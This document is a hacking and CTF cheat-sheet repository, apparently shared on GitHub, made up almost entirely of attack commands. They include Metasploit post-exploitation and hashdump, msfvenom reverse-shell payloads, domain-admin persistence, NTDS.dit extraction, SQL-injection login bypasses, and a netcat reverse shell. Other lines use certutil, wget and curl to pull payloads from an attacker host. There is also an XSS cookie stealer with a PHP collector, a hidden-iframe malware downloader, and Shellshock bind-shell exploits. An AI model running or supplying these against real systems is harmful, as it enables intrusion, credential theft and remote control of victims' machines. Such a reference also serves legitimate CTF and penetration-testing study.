upload file to Windows target 1479 | 1480 | ```bash 1481 | download c:\\windows\\repair\\sam /tmp 1482 | ``` 1483 | 1484 | - Meterpreter download file from Windows target 1485 | 1486 | ```bash 1487 | download c:\\windows\\repair\\sam /tmp 1488 | ``` 1489 | 1490 | - Meterpreter download file from Windows target 1491 | 1492 | ```bash 1493 | execute -f c:\\windows\temp\exploit.exe 1494 | ``` 1495 | 1496 | - Meterpreter run .exe on target – handy for executing uploaded exploits 1497 | 1498 | ```bash 1499 | execute -f cmd -c 1500 | ``` 1501 | 1502 | - Creates new channel with cmd shell 1503 | 1504 | ```bash 1505 | ps 1506 | ``` 1507 | 1508 | - Meterpreter show processes 1509 | 1510 | ```bash 1511 | shell 1512 | ``` 1513 | 1514 | - Meterpreter get shell on the target 1515 | 1516 | ```bash 1517 | getsystem 1518 | ``` 1519 | 1520 | - Meterpreter attempts priviledge escalation the target 1521 | 1522 | ```bash 1523 | hashdump 1524 | ``` 1525 | 1526 | - Meterpreter attempts to dump the hashes on the target (must have privileges; try migrating to winlogon.exe if possible first) 1527 | 1528 | ```bash 1529 | portfwd add –l 3389 –p 3389 –r target 1530 | ``` 1531 | 1532 | - Meterpreter create port forward to target machine 1533 | 1534 | ```bash 1535 | portfwd delete –l 3389 –p 3389 –r target 1536 | ``` 1537 | 1538 | - Meterpreter delete port forward 1539 | 1540 | ```bash 1541 | use exploit/windows/local/bypassuac 1542 | ``` 1543 | 1544 | - Bypass UAC on Windows 7 + Set target + arch, x86/64 1545 | 1546 | ```bash 1547 | use auxiliary/scanner/http/dir_scanner 1548 | ``` 1549 | 1550 | - Metasploit HTTP directory scanner 1551 | 1552 | ```bash 1553 | use auxiliary/scanner/http/jboss_vulnscan 1554 | ``` 1555 | 1556 | - Metasploit JBOSS vulnerability scanner 1557 | 1558 | ```bash 1559 | use auxiliary/scanner/mssql/mssql_login 1560 | ``` 1561 | 1562 | - Metasploit MSSQL Credential Scanner 1563 | 1564 | ```bash 1565 | use auxiliary/scanner/mysql/mysql_version 1566 | ``` 1567 | 1568 | - Metasploit MSSQL Version Scanner 1569 | 1570 | ```bash 1571 | use auxiliary/scanner/oracle/oracle_login 1572 | ``` 1573 | 1574 | - Metasploit Oracle Login Module 1575 | 1576 | ```bash 1577 | use exploit/multi/script/web_delivery 1578 | ``` 1579 | 1580 | - Metasploit powershell payload delivery module 1581 | 1582 | ```bash 1583 | post/windows/manage/powershell/exec_powershell 1584 | ``` 1585 | 1586 | - Metasploit upload and run powershell script through a session 1587 | 1588 | ```bash 1589 | use exploit/multi/http/jboss_maindeployer 1590 | ``` 1591 | 1592 | - Metasploit JBOSS deploy 1593 | 1594 | ```bash 1595 | use exploit/windows/mssql/mssql_payload 1596 | ``` 1597 | 1598 | - Metasploit MSSQL payload 1599 | 1600 | ```bash 1601 | run post/windows/gather/win_privs 1602 | ``` 1603 | 1604 | - Metasploit show privileges of current user 1605 | 1606 | ```bash 1607 | use post/windows/gather/credentials/gpp 1608 | ``` 1609 | 1610 | - Metasploit grab GPP saved passwords 1611 | 1612 | ```bash 1613 | load kiwi 1614 | ``` 1615 | 1616 | ```bash 1617 | creds_all 1618 | ``` 1619 | 1620 | - Metasploit load Mimikatz/kiwi and get creds 1621 | 1622 | ```bash 1623 | run post/windows/gather/local_admin_search_enum 1624 | ``` 1625 | 1626 | - Idenitfy other machines that the supplied domain user has administrative access to 1627 | 1628 | ```bash 1629 | set AUTORUNSCRIPT post/windows/manage/migrate 1630 | ``` 1631 | 1632 | ### **Meterpreter Payloads** 1633 | 1634 | ```bash 1635 | msfvenom –l 1636 | ``` 1637 | 1638 | - List options 1639 | 1640 | ### **Binaries** 1641 | 1642 | ```bash 1643 | msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf 1644 | ``` 1645 | 1646 | ```bash 1647 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe 1648 | ``` 1649 | 1650 | ```bash 1651 | msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho 1652 | ``` 1653 | 1654 | ### **Web Payloads** 1655 | 1656 | ```bash 1657 | msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT= -f raw > shell.php 1658 | ``` 1659 | 1660 | - PHP 1661 | 1662 | ```bash 1663 | set payload php/meterpreter/reverse_tcp 1664 | ``` 1665 | 1666 | - Listener 1667 | 1668 | ```bash 1669 | cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php 1670 | ``` 1671 | 1672 | - PHP 1673 | 1674 | ```bash 1675 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp 1676 | ``` 1677 | 1678 | - ASP 1679 | 1680 | ```bash 1681 | msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp 1682 | ``` 1683 | 1684 | - JSP 1685 | 1686 | ```bash 1687 | msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war 1688 | ``` 1689 | 1690 | - WAR 1691 | 1692 | ### **Scripting Payloads** 1693 | 1694 | ```bash 1695 | msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py 1696 | ``` 1697 | 1698 | - Python 1699 | 1700 | ```bash 1701 | msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh 1702 | ``` 1703 | 1704 | - Bash 1705 | 1706 | ```bash 1707 | msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl 1708 | ``` 1709 | 1710 | - Perl 1711 | 1712 | ### **Shellcode** 1713 | 1714 | For all shellcode see ‘msfvenom –help-formats’ for information as to 1715 | valid parameters. Msfvenom will output code that is able to be cut and 1716 | pasted in this language for your exploits. 1717 | 1718 | ```bash 1719 | msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f 1720 | ``` 1721 | 1722 | ```bash 1723 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f 1724 | ``` 1725 | 1726 | ```bash 1727 | msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f 1728 | ``` 1729 | 1730 | ### **Handlers** 1731 | 1732 | Metasploit handlers can be great at quickly setting up Metasploit to 1733 | be in a position to receive your incoming shells. Handlers should be in 1734 | the following format. 1735 | 1736 | ``` 1737 | exploit/multi/handler set PAYLOAD set LHOST set LPORT set ExitOnSession false exploit -j -z 1738 | ``` 1739 | 1740 | An example is: 1741 | 1742 | ``` 1743 | msfvenom exploit/multi/handler -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f > exploit.extension 1744 | ``` 1745 | 1746 | # **Powershell** 1747 | 1748 | **Execution Bypass** 1749 | 1750 | ```bash 1751 | Set-ExecutionPolicy Unrestricted 1752 | ./file.ps1 1753 | ``` 1754 | 1755 | ```bash 1756 | Import-Module script.psm1 1757 | Invoke-FunctionThatIsIntheModule 1758 | ``` 1759 | 1760 | ```bash 1761 | iex(new-object system.net.webclient).downloadstring(“file:///C:\examplefile.ps1”) 1762 | ``` 1763 | 1764 | **Powershell.exe blocked** 1765 | 1766 | ```bash 1767 | Use ‘not powershell’ [https://github.com/Ben0xA/nps](https://github.com/Ben0xA/nps) 1768 | ``` 1769 | 1770 | **Persistence** 1771 | 1772 | ```bash 1773 | net user username "password" /ADD 1774 | ``` 1775 | 1776 | ```bash 1777 | net group "Domain Admins" %username% /DOMAIN /ADD 1778 | ``` 1779 | 1780 | **Gather NTDS.dit file** 1781 | 1782 | ```bash 1783 | ntdsutil 1784 | ``` 1785 | 1786 | ```bash 1787 | activate instance ntds 1788 | ``` 1789 | 1790 | ```bash 1791 | ifm 1792 | ``` 1793 | 1794 | ```bash 1795 | create full C:\ntdsutil 1796 | ``` 1797 | 1798 | ```bash 1799 | quit 1800 | ``` 1801 | 1802 | ```bash 1803 | quit 1804 | ``` 1805 | 1806 | # **SQLInjections** 1807 | 1808 | ### Common **Injections for Login Forms:** 1809 | 1810 | ```bash 1811 | admin' -- 1812 | ``` 1813 | 1814 | ```bash 1815 | admin' # 1816 | ``` 1817 | 1818 | ```bash 1819 | admin'/* 1820 | ``` 1821 | 1822 | ```bash 1823 | ' or 1=1-- 1824 | ``` 1825 | 1826 | ```bash 1827 | ' or 1=1# 1828 | ``` 1829 | 1830 | ```bash 1831 | ' or 1=1/* 1832 | ``` 1833 | 1834 | ```bash 1835 | ') or '1'='1-- 1836 | ``` 1837 | 1838 | ```bash 1839 | ') or ('1'='1— 1840 | ``` 1841 | 1842 | ## Uploading Files to Target Machine 1843 | 1844 | TFTP 1845 | 1846 | ```bash 1847 | #TFTP Linux: cat /etc/default/atftpd to find out file serving location; default in kali /srv/tftp 1848 | service atftpd start 1849 | 1850 | # Windows 1851 | tftp -i $ATTACKER get /download/location/file /save/location/file 1852 | ``` 1853 | 1854 | FTP 1855 | 1856 | ```bash 1857 | # Linux: set up ftp server with anonymous logon access; 1858 | twistd -n ftp -p 21 -r /file/to/serve 1859 | 1860 | # Windows shell: read FTP commands from ftp-commands.txt non-interactively; 1861 | echo open $ATTACKER>ftp-commands.txt 1862 | echo anonymous>>ftp-commands.txt 1863 | echo whatever>>ftp-commands.txt 1864 | echo binary>>ftp-commands.txt 1865 | echo get file.exe>>ftp-commands.txt 1866 | echo bye>>ftp-commands.txt 1867 | ftp -s:ftp-commands.txt 1868 | 1869 | # Or just a one-liner 1870 | (echo open 10.11.0.245&echo anonymous&echo whatever&echo binary&echo get nc.exe&echo bye) > ftp.txt & ftp -s:ftp.txt & nc.exe 10.11.0.245 443 -e cmd 1871 | ``` 1872 | 1873 | CertUtil (download file from windows) 1874 | 1875 | ```bash 1876 | certutil.exe -urlcache -f http://10.0.0.5/40564.exe bad.exe 1877 | me 1878 | ``` 1879 | 1880 | PHP 1881 | 1882 | ```bash 1883 | 1884 | ``` 1885 | 1886 | Python 1887 | 1888 | ```bash 1889 | python -c "from urllib import urlretrieve; urlretrieve('http://10.11.0.245/nc.exe', 'C:\\Temp\\nc.exe')" 1890 | ``` 1891 | 1892 | HTTP: Powershell 1893 | 1894 | ```bash 1895 | python -c "from urllib import urlretrieve; urlretrieve('http://10.11.0.245/nc.exe', 'C:\\Temp\\nc.exe')" 1896 | ``` 1897 | 1898 | HTTP: Linux 1899 | 1900 | ```bash 1901 | wget http://$ATTACKER/file 1902 | curl http://$ATTACKER/file -O 1903 | scp ~/file/file.bin user@$TARGET:tmp/backdoor.py 1904 | ``` 1905 | 1906 | NetCat 1907 | 1908 | ```bash 1909 | # Attacker 1910 | nc -l -p 4444 < /tool/file.exe 1911 | 1912 | # Victim 1913 | nc $ATTACKER 4444 > file.exe 1914 | ``` 1915 | 1916 | # Web Application 1917 | 1918 | ## LFI (Local File Inclusion) 1919 | 1920 | if we found an LFI, we can check each of those paths, 1921 | 1922 | we can use burpsuite intruder to see all 1923 | Useful LFI files 1924 | Linux 1925 | /etc/passwd 1926 | /etc/shadow 1927 | /etc/issue 1928 | /etc/group 1929 | /etc/hostname 1930 | /etc/ssh/ssh_config 1931 | /etc/ssh/sshd_config 1932 | /root/.ssh/id_rsa 1933 | /root/.ssh/authorized_keys 1934 | /home/user/.ssh/authorized_keys 1935 | /home/user/.ssh/id_rsa 1936 | /proc/[0-9]*/fd/[0-9]* 1937 | /proc/mounts 1938 | /home/$USER/.bash_history 1939 | /home/$USER/.ssh/id_rsa 1940 | /var/run/secrets/kubernetes.io/serviceaccount 1941 | /var/lib/mlocate/mlocate.db 1942 | /var/lib/mlocate.db 1943 | Apache 1944 | /etc/apache2/apache2.conf 1945 | /usr/local/etc/apache2/httpd.conf 1946 | /etc/httpd/conf/httpd.conf 1947 | Red Hat/CentOS/Fedora Linux -> /var/log/httpd/access_log 1948 | Debian/Ubuntu -> /var/log/apache2/access.log 1949 | FreeBSD -> /var/log/httpd-access.log 1950 | /var/log/apache/access.log 1951 | /var/log/apache/error.log 1952 | /var/log/apache2/access.log 1953 | /var/log/apache/error.log 1954 | MySQL 1955 | /var/lib/mysql/mysql/user.frm 1956 | /var/lib/mysql/mysql/user.MYD 1957 | /var/lib/mysql/mysql/user.MYI 1958 | Windows 1959 | /boot.ini 1960 | /autoexec.bat 1961 | /windows/system32/drivers/etc/hosts 1962 | /windows/repair/SAM 1963 | /windows/panther/unattended.xml 1964 | /windows/panther/unattend/unattended.xml 1965 | /windows/system32/license.rtf 1966 | /windows/system32/eula.txt 1967 | 1968 | Situation 1969 | 1970 | ``` 1971 | http:///index.php?parameter=value 1972 | 1973 | ``` 1974 | 1975 | ### How to Test 1976 | 1977 | ``` 1978 | http:///index.php?parameter=php://filter/convert.base64-encode/resource=index 1979 | 1980 | ``` 1981 | 1982 | ``` 1983 | http:///script.php?page=../../../../../../../../etc/passwd 1984 | OR 1985 | http:///script.php?page=..//..//..//..//..//..//../etc/passwd 1986 | OR 1987 | curl http:///script.php?page=..//..//..//..//..//..//../etc/passwd 1988 | 1989 | ``` 1990 | 1991 | ``` 1992 | http:///script.php?page=../../../../../../../../boot.ini 1993 | 1994 | ``` 1995 | 1996 | ### LFI Payloads 1997 | 1998 | - [Payload All the Things](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion/Intruders) 1999 | - [Seclist LFI Intruder](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI) 2000 | 2001 | ## XSS 2002 | 2003 | ### Reflected 2004 | 2005 | ### Simple test 2006 | 2007 | This is a simple test to see what happens, this is not a prove that the field is vuln to xss 2008 | 2009 | 2010 | 2011 | ### Simple XSS test 2012 | 2013 | <script>alert('Found')</script> 2014 | 2015 | "><script>alert(Found)</script>"> 2016 | 2017 | <script>alert(String.fromCharCode(88,83,83))</script> 2018 | 2019 | ### Bypass filter of tag script 2020 | 2021 | `" onload="alert(String.fromCharCode(88,83,83))` 2022 | 2023 | " onload="alert('XSS') 2024 | 2025 | bla is not a valid image, so this cause an error 2026 | 2027 | <img src='bla' onerror=alert("XSS")> 2028 | 2029 | ### Persistent 2030 | 2031 | >document.body.innerHTML="<style>body{visibility:hidden;}</style><div style=visibility:visible;><h1>HACKED!</h1></div>"; 2032 | 2033 | ### PHP collector 2034 | 2035 | `> cookie.txtchmod 777 cookie.txt` 2036 | 2037 | edit a php page like colector.php as follow: 2038 | 2039 | <?php $cookie=GET['cookie']; $useragent=$_SERVER['HTTP_USER_AGENT']; $file=fopen('cookie.txt', 'a'); fwrite($file,"USER AGENT:$useragent || COOKIE=$cookie\n"); fclose($file); 2040 | ?> 2041 | 2042 | Script to put in page: 2043 | 2044 | <scritp>new Image().src="http://OUR_SERVER_IP/colector.php?cookie="+document.cookie;</script> 2045 | 2046 | ### Malware Donwloader via XSS 2047 | 2048 | <iframe src="http://OUR_SERVER_IP/OUR_MALWARE" height="0" width="0"></iframe> 2049 | 2050 | ### How to play Mario with XSS 2051 | 2052 | <iframe src="https://jcw87.github.io/c2-smb1/" width="100%" height="600"></iframe> 2053 | 2054 | <input onfocus="document.body.innerHTML=atob('PGlmcmFtZSBzcmM9Imh0dHBzOi8vamN3ODcuZ2l0aHViLmlvL2MyLXNtYjEvIiB3aWR0aD0iMTAwJSIgaGVpZ2h0PSI2MDAiPjwvaWZyYW1lPg==')" autofocus> 2055 | 2056 | ### XSS payloads 2057 | 2058 | - [Payload All The Things](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection) 2059 | - [Seclist XSS](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/XSS) 2060 | 2061 | ## MySql Cheat Sheet 2062 | 2063 | ```bash 2064 | mysql -u [username] -p; #connect, you will be asked for password 2065 | SHOW DATABASES; 2066 | use DB_NAME; 2067 | SHOW TABLES; 2068 | select * from TABLE; 2069 | ``` 2070 | 2071 | [MySQL cheatsheet](https://devhints.io/mysql) 2072 | 2073 | [MySQL Cheat Sheet](https://www.mysqltutorial.org/mysql-cheat-sheet.aspx) 2074 | 2075 | # Misc 2076 | 2077 | ## Linux file permissions 2078 | 2079 | ![Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%202.png](Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%202.png) 2080 | 2081 | ## Linux Cheat Sheet 2082 | 2083 | ![Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%203.png](Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%203.png) 2084 | 2085 | [](https://itblogr.com/wp-content/uploads/2020/04/The-Concise-Blue-Team-cheat-Sheets.pdf?fbclid=IwAR2lG6uxX3cMwu4G80Vwl_ZxpddwEPDqsyXb27yw5xjMOnAB1zX9ZEjDl78) 2086 | 2087 | [Hacking Cheat Sheets](https://cheatography.com/tag/hacking/) 2088 | 2089 | ![Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%204.png](Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%204.png) 2090 | 2091 | ![Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%205.png](Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%205.png) 2092 | 2093 | vi cheat sheet 2094 | 2095 | ![Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%206.png](Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%206.png) 2096 | 2097 | ## find cheat sheet 2098 | 2099 | ![Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%207.png](Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%207.png) 2100 | 2101 | ## Simple Local Web Servers 2102 | 2103 | Python local web server command, handy for serving up shells and exploits on an attacking machine. 2104 | 2105 | ```bash 2106 | python -m SimpleHTTPServer 80 2107 | python3 -m http.server 2108 | python -m pyftpdlib -p 21 #start a local ftp server with anonymous:anonymouscer 2109 | 2110 | updog 2111 | 2112 | ruby -rwebrick -e "WEBrick::HTTPServer.new 2113 | (:Port => 80, :DocumentRoot => Dir.pwd).start" 2114 | 2115 | php -S 0.0.0.0:80 2116 | ``` 2117 | 2118 | ## Hash Examples 2119 | 2120 | Likely just use **hash-identifier** for this but here are some example hashes: 2121 | 2122 | [Untitled](Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%20Database%202c8912d8c7b747859491d93a41439662.csv) 2123 | 2124 | # Text Manipulation 2125 | 2126 | ## [awk](https://www.howtogeek.com/562941/how-to-use-the-awk-command-on-linux/) - command-line text manipulation dynamo 2127 | 2128 | ```bash 2129 | awk -F: '{print $1,$6}' /etc/passwd 2130 | $0: Represents the entire line of text. 2131 | $1: Represents the first field. 2132 | $2: Represents the second field. 2133 | $7: Represents the seventh field. 2134 | $45: Represents the 45th field. 2135 | $NF: Stands for “number of fields,” and represents the last field. 2136 | -F (separator string) 2137 | ``` 2138 | 2139 | ### Sublime Text Editor 2140 | 2141 | ```jsx 2142 | Splitting the Selection into Lines 2143 | 2144 | Select a block of lines, and then split it into many selections, one per line, using: 2145 | 2146 | Windows/Linux: Ctrl+Shift+L 2147 | ``` 2148 | 2149 | ### sed cheat sheet 2150 | 2151 | ![https://s3.studylib.net/store/data/008266685_1-65c7d170c2600d5fd58feafc3611414f.png](https://s3.studylib.net/store/data/008266685_1-65c7d170c2600d5fd58feafc3611414f.png) 2152 | 2153 | ## Useful links 2154 | 2155 | [A cheat-sheet for password crackers](https://www.unix-ninja.com/p/A_cheat-sheet_for_password_crackers) 2156 | 2157 | [Penetration testing and webapp cheat sheets](https://doxsec.wordpress.com/2017/07/21/penetration-testing-and-webapp-cheat-sheets/) 2158 | 2159 | [The Ultimate List of SANS Cheat Sheets](https://www.sans.org/blog/the-ultimate-list-of-sans-cheat-sheets/?utm_medium=Social&utm_source=Twitter&utm_content=EMEA&utm_campaign=Security%20Trends%20Blog) 2160 | 2161 | [](https://www.sans.org/security-resources/posters/blueprint-building-pen-tester/160/download) 2162 | 2163 | [](https://www.sans.org/security-resources/posters/pen-test-pivots-payloads/180/download) 2164 | 2165 | [coreb1t/awesome-pentest-cheat-sheets](https://github.com/coreb1t/awesome-pentest-cheat-sheets) 2166 | 2167 | [Penetrating Testing/Assessment Workflow](https://gist.github.com/jivoi/724e4b4b22501b77ef133edc63eba7b4) 2168 | 2169 | [0DAYsecurity.com - The fastest resource to a proactive security](http://www.0daysecurity.com/pentest.html) 2170 | 2171 | [OSCP Ultimate CheatSheet - ByteFellow](https://www.bytefellow.com/oscp-ultimate-cheatsheet/) 2172 | 2173 | [Linux Privilege Escalation CheatSheet for OSCP - ByteFellow](https://www.bytefellow.com/linux-privilege-escalation-cheatsheet-for-oscp/) 2174 | 2175 | [Windows Privilege Escalation Cheatsheet for OSCP - ByteFellow](https://www.bytefellow.com/windows-privilege-escalation-cheatsheet-for-oscp/) 2176 | 2177 | [Cheat Sheet](https://jok3rsecurity.com/cheat-sheet/) 2178 | 2179 | [CountablyInfinite/oscp_cheatsheet](https://github.com/CountablyInfinite/oscp_cheatsheet) 2180 | 2181 | [OSCP: Developing a Methodology](https://falconspy.medium.com/oscp-developing-a-methodology-32f4ab471fd6) 2182 | 2183 | [Passing OSCP](https://scund00r.com/all/oscp/2018/02/25/passing-oscp.html) 2184 | 2185 | [swisskyrepo/PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings) 2186 | 2187 | [](https://storage.googleapis.com/vkmedia-wp-blogg-vk/uploads/uploads/sites/710/2013/08/Linux-101-Hacks.pdf) 2188 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Hacking-and-CTF-Cheat-Sheet 2 | 3 | This is my collection of Commands and Syntax for all utils i use when trying to hack CTF's challanges. 4 | 5 | Enjoy 6 | @hasamba 7 | 8 | # Hacking Cheat Sheet 9 | 10 | # Reconnaissance (Information Gathering) 11 | 12 | - [hunter.io](https://hunter.io/) - known email and users for a specific domain 13 | - theharvester - search for emails in several search engines 14 | 15 | ```bash 16 | theHarvester -d *.co.il -l 500 -b google 17 | ``` 18 | 19 | - sublist3r - search for subdomain for a given domain 20 | - [crt.sh](http://crt.sh) - subdomains search with %.tesla.co.il 21 | - [httprobe](https://github.com/tomnomnom/httprobe) - will check a list of domain if they are alive, we can fire it sublis3r results 22 | - [amass](https://github.com/OWASP/Amass) - can also search for subdomains and more 23 | 24 | ```bash 25 | amass enum -d tesla.com 26 | ``` 27 | 28 | - [builtwith](https://builtwith.com/) - show frameworks and technologies any domain is built with, then we can search for exploits for those technologies 29 | - [wappalizer](https://www.wappalyzer.com/download/) - browser addon that does almost the same as builtwith 30 | - whatweb - same but uglier than builtwith 31 | - [sumrecon](https://github.com/Gr1mmie/sumrecon) - script that automate some of the above 32 | - [shodan.io](http://shodan.io) - find open ports and services online 33 | - [dnsdumpster](https://dnsdumpster.com/) - dns recon & research, find & lookup dns records 34 | - [ipinfo.io](http://ipinfo.io) - ip info 35 | - [dehashed](https://www.dehashed.com) - find leaked emails and passwords 36 | - simplyemail - enumerate all the online places (github, target site etc) 37 | 38 | ``` 39 | git clone https://github.com/killswitch-GUI/SimplyEmail.git 40 | ./SimplyEmail.py -all -e TARGET-DOMAIN 41 | ``` 42 | 43 | - DNSRecon - DNS Bruteforce 44 | 45 | ```bash 46 | dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml 47 | ``` 48 | 49 | - Skipfish - prepares an interactive sitemap for the targeted site 50 | 51 | ```bash 52 | # basic scan 53 | skipfish -o out_dir https://www.host.com 54 | # using cookies to access authenticated pages 55 | skipfish -o out_dir -I urls_to_scan -X urls_not_to_scan -C cookie1=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX -C cookie2=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX https://www.host.com 56 | ``` 57 | 58 | - [namechk](https://namechk.com/) / [whatsmyname](https://whatsmyname.app/) / [namecheckup](https://namecheckup.com/) - OSINT use accounts around the web 59 | - [maltego](https://sectools.org/tool/maltego/) - data mining application 60 | 61 | - Exploiting Shellshock 62 | 63 | ```bash 64 | git clone https://github.com/nccgroup/shocker 65 | ``` 66 | 67 | ```bash 68 | ./shocker.py -H TARGET --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose 69 | ``` 70 | 71 | cat file (view file contents) 72 | 73 | ```bash 74 | echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo \$(</etc/passwd)\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc TARGET 80 75 | ``` 76 | 77 | Shell Shock run bind shell 78 | 79 | ```bash 80 | echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc TARGET 80 81 | ``` 82 | 83 | Shell Shock reverse Shell 84 | 85 | ```bash 86 | nc -l -p 443 87 | ``` 88 | 89 | # Scanning 90 | 91 | - arp-scan (Kali) - gives all IP's on NAT 92 | - netdiscover (Kali) - show live IP's 93 | 94 | ```bash 95 | sudo netdiscover -r 10.0.0.0/24 96 | ``` 97 | 98 | - [rustscan](https://github.com/RustScan/RustScan#-usage) - Scans all 65k ports in 3 seconds and pipe them to NMAP 99 | 100 | ```bash 101 | rustscan -a 127.0.0.1 -- -A -sC 102 | #it's like running nmap -Pn -vvv -p $PORTS -A -sC 127.0.0.1 103 | ``` 104 | 105 | - nmap 106 | 107 | ```bash 108 | nmap -T4 -p- -A 192.168.249.128 109 | nmap -sV -sC -O FILENAME IP 110 | nmap -sU -sV --script=vuln #search vulnarabilities 111 | #T4: speed 1-5, prefered 4, 112 | #-p-: scan all 65K ports, 113 | #-A: all information possible, 114 | #-sS: stealth mode is running by default, it means that we do not establish a connection, instead after ACK we send a reset (SYN→SYNACK→RST) 115 | #-sV: find versions 116 | #-sc: default script 117 | #-O: output to file 118 | ls /usr/share/nmap/scripts/* | grep ftp #Search nmap scripts for keywords 119 | 120 | #clean results 121 | grep '/tcp' FILENAME | awk -F "/" '{print $1}'| tr '\n' ',';echo 122 | ``` 123 | 124 | - masscan (kali): another fast port scanner 125 | 126 | ```bash 127 | masscan -p1-65535 --rate 1000 10.0.0.101 128 | ``` 129 | 130 | - metasloit - auxiliary in msf is extra enumration and recon 131 | 132 | ```bash 133 | use auxiliary/scanner/smb/smb_version 134 | ``` 135 | 136 | - searchsploit (kali) - search exploit-db website offline 137 | 138 | ```bash 139 | searchsploit mod ssl 2 140 | ``` 141 | 142 | - [Nessus](https://www.tenable.com/products/nessus) - vulnerability assessment, it can scan for open ports, open vulnerabilities, directory busting 143 | - openvas - Vulnerability Assessment 144 | 145 | ```bash 146 | apt-get update 147 | apt-get dist-upgrade -y 148 | apt-get install openvas 149 | openvas-setup 150 | netstat -tulpn #Verify openvas is running using 151 | #Login at https://127.0.0.1:9392 - credentials are generated during openvas-setup 152 | 153 | ``` 154 | 155 | ## AIO Scanners 156 | 157 | - [nmap automator](https://github.com/21y4d/nmapAutomator) - A script that you can run in the background! 158 | 159 | ```bash 160 | ./nmapAutomator.sh <TARGET-IP> <TYPE> 161 | ./nmapAutomator.sh 10.1.1.1 All 162 | ./nmapAutomator.sh 10.1.1.1 Basic 163 | ./nmapAutomator.sh 10.1.1.1 Recon 164 | ``` 165 | 166 | - [autorecon](https://github.com/Tib3rius/AutoRecon) - multi-threaded network reconnaissance tool which performs automated enumeration of services 167 | 168 | ```bash 169 | autorecon 127.0.0.1 170 | 171 | ``` 172 | 173 | - [Vanquish](https://github.com/frizb/Vanquish) - AIO tool (NMap | Hydra | Nikto | Metasploit | | Gobuster | Dirb | Exploitdb | Nbtscan | | Ntpq | Enum4linux | Smbclient | Rpcclient | | Onesixtyone | Sslscan | Sslyze | Snmpwalk | | Ident-user-enum | Smtp-user-enum | Snmp-check | Cisco-torch | | Dnsrecon | Dig | Whatweb | Wafw00f | | Wpscan | Cewl | Curl | Mysql | Nmblookup | Searchsploit | | Nbtscan-unixwiz | Xprobe2 | Blindelephant | Showmount) 174 | 175 | ```bash 176 | echo "[IP]" > ~/tools/vanquish/hosts.txt 177 | python2 Vanquish2.py -hostFile hosts.txt -logging -outputFolder ~/hackthebox/[BOXNAME] 178 | 179 | ``` 180 | 181 | - [hackerEnv](https://github.com/abdulr7mann/hackerEnv) - automation tool that quickly and easily sweep IPs and scan ports, vulnerabilities and exploit them 182 | 183 | ```bash 184 | ./hackerEnv -t 10.10.10.10 185 | ``` 186 | 187 | - [fsociety](https://github.com/Manisso/fsociety) - A Penetration Testing Framework, you will have every script that a hacker needs 188 | 189 | - recon-ag - full-featured web reconnaissance framework written in Python 190 | 191 | ```bash 192 | git clone https://github.com/lanmaster53/recon-ng.gitcd /recon-ng 193 | ./recon-ng 194 | show modules 195 | help 196 | ``` 197 | 198 | - [autorecon](https://github.com/Tib3rius/AutoRecon) - multi-threaded network reconnaissance tool which performs automated enumeration of services 199 | 200 | ```bash 201 | autorecon 127.0.0.1 202 | ``` 203 | 204 | - [legion](https://github.com/carlospolop/legion) - Automatic Enumeration Tool 205 | 206 | ```jsx 207 | sudo ~/tools/legion/legion.py 208 | options 209 | set host 10.0.0.210 210 | run 211 | ``` 212 | 213 | # Enumeration Open Ports 214 | 215 | [Pentesting Network](https://book.hacktricks.xyz/pentesting/pentesting-network) 216 | 217 | ## FTP Enumeration (21) 218 | 219 | ```bash 220 | nmap –script ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 